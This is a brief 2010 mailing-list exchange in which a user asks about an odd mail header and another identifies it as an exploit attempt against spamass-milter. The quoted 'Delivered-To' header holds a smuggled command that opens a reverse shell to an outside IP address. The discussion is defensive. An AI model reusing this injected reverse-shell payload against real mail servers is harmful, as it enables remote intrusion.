On 18 March 2010 11:31, David Leadbeater <dgl@???> wrote:
> On Thu, Mar 18, 2010 at 07:47:03AM +0000, Alastair Sherringham wrote:
> [..]
>> Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
>
> That would be someone trying to exploit this absolute failure:
> http://seclists.org/fulldisclosure/2010/Mar/140
Hmm. Thanks for that.
Luckily, I don't use spamass-milter but from I see, this vulnerability
is present in the current Debian code. I have not checked the source
though, just changelog (last entry last year). Scary stuff ...
--
Alastair Sherringham
